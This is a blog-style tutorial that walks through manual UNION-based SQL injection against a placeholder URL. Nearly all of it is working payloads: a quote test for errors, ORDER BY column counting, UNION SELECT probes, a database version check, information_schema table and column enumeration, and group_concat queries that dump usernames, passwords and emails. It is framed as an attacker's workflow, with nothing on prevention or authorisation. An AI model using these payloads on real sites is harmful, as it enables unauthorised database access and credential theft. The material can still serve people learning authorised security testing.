SQL injection from the start

First things first: what actually SQL injections is?

Most of the web applications stores data in the backend. Which is normally not directly accessible and sometimes you find that developer made some mistakes or just forgot to sanitize user input. Here we can perform SQL injection to manipulate data and run SQL commands.
Today SQL injection is one of the common vulnerabilities in web applications.
In simple word it allows an attacker to execute database query web application and gain access to some critical data.
So in this Blog, we’ll cover up a single type of SQL injection “manual or error or UNION based SQL injection”
Here we go step to step just right below.

1. Checking the web application if it’s vulnerable to SQL injection

Just for while imagining our URL is like this

http://vulnerable.url/results.php?id=26

Now to test it we add ‘ (quote) in the end of URL,

http://vulnerable.url/results.php?id=26'

So if we get some error like
“You have an error in your SQL syntax, check the manual that corresponds to your MySQL server version etc…”
or something similar MySQL that means is vulnerable to SQL injection.

2. Now find the number of columns present in the database.

For that, we use ORDER BY ( this tells database how to order the result)

so we just incrementing the number until we get an error.

http://vulnerable.url/results.php?id=26 order by 1/* <-- no error

http://vulnerable.url/results.php?id=26 order by 2/* <-- no error

http://vulnerable.url/results.php?id=26 order by 3/* <-- no error
.
..
....

http://vulnerable.url/results.php?id=26 order by 7/* <-- error

#we get something like this Unknown column ‘7’ in ‘order clause’ or similar#

that indicates that it has 6 columns, cause we got an error on 7.

3. Review for UNION function

With the union, we can select more data in one SQL statement.

http://vulnerable.url/results.php?id=26 union all select 1,2,3,4,5,6/*

#we already found that a number of columns are 6 #

if we see some numbers on the screen, i.e 1 or 2 or 3 or any other then the UNION works 🙂

NOTE:
if /* not working for you getting some error, then try -- OR ?id=-26 -- -
example,
http://vulnerable.url/results.php?id=26 union all select 1,2,3,4,5,6--
OR
http://vulnerable.url/results.php?id=-26 union all select 1,2,3,4,5,6-- -

4. Check for MySQL version

For instance, we have number 4 on the screen, now to check for the version we replace the number 4 with @@version or version() then we get something similar to 4.1.33 or 5.0.45.

it should look like this

http://vulnerable.url/results.php?id=26 union all select 1,2,3,@@version,5,6--

5. Getting table and column name

We use information_schema as it holds all tables and columns in the database.

for database name:

http://vulnerable.url/results.php?id=26 union all select 1,2,3,database(),5,6--

for tables:

http://vulnerable.url/results.php?id=26 union all select 1,2,3,table_name,5,6 from information_schema.tables--
OR
http://vulnerable.url/results.php?id=26 union all select 1,2,3,group_concat(table_name),5,6 from information_schema.table_constraints--

we replace 4 with table_name to get the first table from information_schema.tables

here you get some tables like username, user, login, password, pass, passwd etc.
to display column names for specific table

http://vulnerable.url/results.php?id=26 union all select 1,2,3,column_name,5,6 from information_schema.columns where table_name='user'--
OR
http://vulnerable.url/results.php?id=26 union all select 1,2,3,group_concat(column_name),5,6 from information_schema.columns where table_name='user'--

Now you got some specific data like id,user,pass to view this use

http://vulnerable.url/results.php?id=26 union all select 1,2,3,group_concat(id,0x3a,user,0x3a,pass),5,6 from user--
OR
http://vulnerable.url/results.php?id=26 union all select 1,concat(user,0x3a,pass,0x3a,email) from users--

This will give us the data in form of this syntax “user:pass:email” from table users.
note: 0x3a means “:” we use this to separate the values.

Still STUCK at some point just comment down 🙂

4 Comments

Leave a Reply to Raghav Jindal Cancel reply

Your email address will not be published. Required fields are marked *